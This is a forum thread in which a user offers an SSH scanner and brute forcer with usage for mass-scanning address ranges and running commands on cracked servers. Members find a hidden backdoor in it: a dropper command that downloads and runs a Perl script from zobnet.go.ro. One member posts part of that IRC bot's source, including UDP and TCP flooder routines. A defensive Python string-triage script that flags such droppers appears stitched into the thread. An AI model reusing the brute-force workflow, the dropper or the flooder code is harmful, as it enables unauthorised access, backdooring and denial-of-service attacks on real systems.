halucin0g3n (thread author), posted July 1, 2014 (edited):

Hi,

Over the last few days I've been working on an SSH scanner & brute forcer. I got the idea when I stumbled across a source on the net, fulg.c. Anyway, starting from the fulg.c source, I ended up changing over 90% of the code. First, the scanner allows running commands on the guessed servers; second, it will only run on Linux x64 systems.

How to run the scan command:
./brute 800 -b 80.242 passfile 22 "uname -a"

uname -a is the command run on the servers. Mind the quotes for commands longer than one word, where there are spaces.

Servers are saved in sparte.txt in the following format:
root:password 84.242.202.220:22 --> Linux OpenWrt 2.6.33.5 #631 Mon Jun 27 10:04:08 NOVST 2011 armv6l unknown
i.e. user:password ip:port and the output of the uname -a command. This way we know for sure what we catch, when we catch it. It can also be used to automatically upload archives, start applications, etc. on the caught servers; the idea is to be inventive.

I've included two scripts in the archive to make working with the scanner easier. We have: a and mass. Edit the file a to change the command to execute and run ./a ip.ip port. For a scan on a class A we have the file mass, which we run as ./mass a b port, where a = the class A and b = the class B to start from. If we run ./mass 5 100 22 it will scan 5.100, 5.101, 5.102 up to 5.255. If we run ./mass 5 0 22 it will scan 5.0, 5.1, 5.2 up to 5.255.

Download // REMOVED

Good luck!

Edited July 3, 2014 by Nytro
.Breacker, posted July 1, 2014: Very nice and good, thank you. It works well.
Sadiq, posted July 1, 2014 (edited): For me ./mass doesn't work...
Linux ***************** 2.6.32-358.14.1.el6.x86_64 #1 SMP Tue Jul 16 23:51:20 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
In fact the only command that works is this one:
./brute 800 -b 80.242 passfile 22 "uname -a"
Oh well, I change the class B and it scans and seems to try to crack. We'll see tomorrow morning.
Edited July 1, 2014 by Sadiq
GarryOne, posted July 1, 2014: Please put it on a decent file host as well.
halucin0g3n (thread author), posted July 1, 2014: sadiq, mass is just a bash script, modify it to fit your needs. I made it in a hurry.. it's really not important
mrtornado, posted July 1, 2014: halucin0g3n well done mate, I've been waiting for a good one for a long time too
halucin0g3n (thread author), posted July 1, 2014: thanks, now I'm also working on a VNC brute, I'm running into a few problems with the sockets but I'll get that one done too
mrtornado, posted July 1, 2014: what can I say ... my VNC brute is decent but I'm looking forward to seeing that one too. pm when it comes in case I miss it
Gio33, posted July 1, 2014: Are you sure the threads work correctly? No matter whether I set 10, 800 or 2000, it moves at the same speed. On another note, I hope there's no mailer / ftp / http sender in it; I haven't had time to go through it with a fine-tooth comb, but I do see you packed it with UPX. Is it hiding something?
halucin0g3n (thread author), posted July 1, 2014 (edited): it works. the executable was 3MB because it was compiled statically with all the libraries needed for portability.
Edited July 1, 2014 by halucin0g3n
Gio33, posted July 3, 2014:
cd /var/tmp;mkdir test; echo 'wget zobnet.go.ro/perl.pl
I found this after unpacking. BAN THIS MOFO. @Nytro
Nytro, posted July 3, 2014 (edited): Firefox can't find the server at zobnet.go.ro.
Yes:
cd /var/tmp;mkdir test; echo 'wget zobnet.go.ro/perl.pl
perl perl.pl
rm perl*
rm a' > a; bash a &
Looks like a backdoor. We're waiting for a message from the gentleman above with some explanations. Link removed.
Edited July 3, 2014 by Nytro
Gio33, posted July 3, 2014 (edited): Here you go:

@resp) {
    $c++;
    chop $linha;
    sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
    if ($c == "$linas_max") {
        $c=0;
        sleep $sleep;
    }
}
exit;
}
}
}
##############
sub udpflooder {
    my $iaddr = inet_aton($_[0]);
    my $msg = 'A' x $_[1];
    my $ftime = $_[2];
    my $cp = 0;
    my (%pacotes);
    $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
    socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
    socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
    socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
    socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
    return(undef) if $cp == 4;
    my $itime = time;
    my ($cur_time);
    while ( 1 ) {
        for (my $port = 1; $port <= 65000; $port++) {
            $cur_time = time - $itime;
            last if $cur_time >= $ftime;
            send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
            send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
            send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
            send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
            for (my $pc = 3; $pc <= 255;$pc++) {
                next if $pc == 6;
                $cur_time = time - $itime;
                last if $cur_time >= $ftime;
                socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
                send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
            }
        }
        last if $cur_time >= $ftime;
    }
    return($cur_time, %pacotes);
}
##############
sub tcpflooder {
    my $itime = time;
    my ($cur_time);
    my ($ia,$pa,$proto,$j,$l,$t);
    $ia=inet_aton($_[0]);
    $pa=sockaddr_in($_[1],$ia);
    $ftime=$_[2];
    $proto=getprotobyname('tcp');
    $j=0;$l=0;
    $cur_time = time - $itime;
    while ($l<1000){
        $cur_time = time - $itime;
        last if $cur_time >= $ftime;
        $t="SOCK$l";
        socket($t,PF_INET,SOCK_STREAM,$proto);
        connect($t,$pa)||$j--;
        $j++;$l++;
    }
    $l=0;
    while ($l<1000){
        $cur_time = time - $itime;
        last if $cur_time >= $ftime;
        $t="SOCK$l";
        shutdown($t,2);
        $l++;
    }
}
##############
sub msg { return unless $#_ == 1; sendraw("PRIVMSG $_[0] :$_[1]");}
sub ctcp { return unless $#_ == 1; sendraw("PRIVMSG $_[0] :\001$_[1]\001");}
sub notice { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]");}
sub op { return unless $#_ == 1; sendraw("MODE $_[0] +o $_[1]");}
sub deop { return unless $#_ == 1; sendraw("MODE $_[0] -o $_[1]");}
sub voice { return unless $#_ == 1; sendraw("MODE $_[0] +v $_[1]");}
sub devoice { return unless $#_ == 1; sendraw("MODE $_[0] -v $_[1]");}
sub j { &join(@_); }
sub join { return unless $#_ == 0; sendraw("JOIN $_[0]");}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick { return unless $#_ == 0; sendraw("NICK $_[0]");}
sub quit { sendraw("QUIT :$_[0]"); exit;}
sub modo { return unless $#_ == 0; sendraw("MODE $_[0] $_[1]");}
sub mode { modo(@_); }
sub invite { return unless $#_ == 1; sendraw("INVITE $_[1] $_[0]");}
sub topico { return unless $#_ == 1; sendraw("TOPIC $_[0] $_[1]");}
sub topic { topico(@_); }
sub away { sendraw("AWAY $_[0]");}
sub back { away(); }
}
######################## END ########################

Edited July 3, 2014 by Gio33
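What Gio33 did here (unpack the UPX binary, read its strings, spot the dropper command and the IRC bot it fetches) is the routine static triage anyone should run on a tool downloaded from a forum before executing it. The script below is an added example, not code from this thread or from the tool being discussed: it pulls printable strings out of an unpacked binary the way `strings -n` does, then flags the two shapes of evidence seen above: an embedded fetch-run-cleanup shell chain (downloader, redirect into a file, `bash` of that same file, `rm` of the traces) and IRC protocol verbs or flooder routine names that have no business in an SSH scanner. The sample blob is constructed inline and the domain in it is a placeholder, not a real host.

```python
"""Static triage of an unpacked binary: flag embedded download-and-execute
shell chains and IRC-bot strings among its printable strings.
Added example; the sample blob below is constructed, not a real file."""
import re
from typing import Dict, List

MIN_STRING_LEN = 6

# Shell fragments that together make up a "fetch, run, clean up" dropper.
DOWNLOADERS = re.compile(r"\b(wget|curl|fetch|tftp)\b")
INTERPRETERS = re.compile(r"\b(perl|python|sh|bash)\b\s+\S+")
CLEANUP = re.compile(r"\brm\s+(-rf?\s+)?\S+")
# "> FILE; bash FILE" / "> FILE; sh FILE": write a script, then run that file.
WRITE_AND_RUN = re.compile(r">\s*(\S+)\s*;\s*(?:ba)?sh\s+\1\b")

# IRC client verbs and flooder names, the fingerprint of a bot like the one
# Gio33 posted (PRIVMSG/NOTICE/JOIN handlers, udpflooder/tcpflooder subs).
IRC_VERBS = re.compile(r"\b(PRIVMSG|NOTICE|JOIN|NICK|MODE|TOPIC)\b\s")
FLOOD_NAMES = re.compile(r"\b(udp|tcp|syn|icmp)flood", re.IGNORECASE)


def extract_strings(blob: bytes, min_len: int = MIN_STRING_LEN) -> List[str]:
    """Return runs of printable ASCII (tab/newline allowed, so a multi-line
    embedded script stays one string) at least min_len bytes long."""
    pattern = rb"[\x09\x0a\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def triage(blob: bytes) -> List[Dict[str, object]]:
    """Scan every extracted string and return those with a reason to worry."""
    findings = []
    for s in extract_strings(blob):
        reasons = []
        if DOWNLOADERS.search(s) and (WRITE_AND_RUN.search(s) or INTERPRETERS.search(s)):
            reasons.append("download-and-execute chain")
        if DOWNLOADERS.search(s) and CLEANUP.search(s):
            reasons.append("removes its own artifacts")
        if IRC_VERBS.search(s):
            reasons.append("IRC protocol verb")
        if FLOOD_NAMES.search(s):
            reasons.append("flooder routine name")
        if reasons:
            findings.append({"string": s, "reasons": reasons})
    return findings


# Constructed stand-in for an unpacked ELF: a legitimate usage string, an
# embedded dropper script (placeholder domain), a few opcodes, an IRC format
# string, a flooder sub name and a normal library reference.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"Usage: ./brute <threads> -b <class> <passfile> <port> <cmd>\x00"
    + b"cd /var/tmp;mkdir test; echo 'wget dropper.example.invalid/perl.pl\n"
      b"perl perl.pl\nrm perl*\nrm a' > a; bash a &\x00"
    + b"\x90\x90\x90\x00"
    + b"PRIVMSG %s :%s\x00"
    + b"udpflooder\x00"
    + b"libc.so.6\x00"
)

if __name__ == "__main__":
    for finding in triage(SAMPLE_BLOB):
        print(", ".join(finding["reasons"]), "->", repr(finding["string"]))
```

Run it against `upx -d` output (or any binary) by replacing `SAMPLE_BLOB` with the file's bytes. A hit is a reason to read the binary further, not proof on its own; the point is that a statically linked "3MB for portability" executable still exposes its embedded shell text once unpacked, which is exactly how this backdoor was caught.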
Nytro, posted July 3, 2014: Yes, it is a backdoor. @halucin0g3n aka Castiel, we're waiting for some explanations.
Ganav, posted July 3, 2014: I don't think he'll give explanations. In this case what the forum rules say can be applied directly.
Maximus, posted July 3, 2014: @Nytro; we really shouldn't wait. Do you think he's dumb enough to reply? And what would he say? "Oh my, I'm sorry, that archive was for my girlfriend"
Cryo, posted July 3, 2014: Just because zobnet.go.ro isn't up right now doesn't mean the domain isn't bought and that the command centre can't be activated in the future; let's hope the damage will be minimal.
halucin0g3n (thread author), posted July 3, 2014: man, honestly I don't know what to say. I don't want it to look like I'm covering my ass, or like "oh my, hold on, it's not like that" and so on. honestly, I used that function during testing. it's not active, the scanner uses another function. a thousand apologies.
halucin0g3n (thread author), posted July 3, 2014: I can upload a version without that function, not that I care what x y z on the forum says, but I feel awkward. the new version takes usernames from one file and passwords from another, if that helps at all...
-Immortal-, posted July 3, 2014, quoting halucin0g3n: "I can upload a version without that function, not that I care what x y z on the forum says, but I feel awkward. the new version takes usernames from one file and passwords from another, if that helps at all..."
halucin0g3n (thread author), posted July 3, 2014: immortal, I swear you're acting as if you'd hired me to write you some code and I let you down, for crying out loud.
halucin0g3n (thread author), posted July 3, 2014: you wish me dead or what, did I hurt your feelings
Elohim, posted July 3, 2014: Better post the source, not 4 changed lines and a recompile.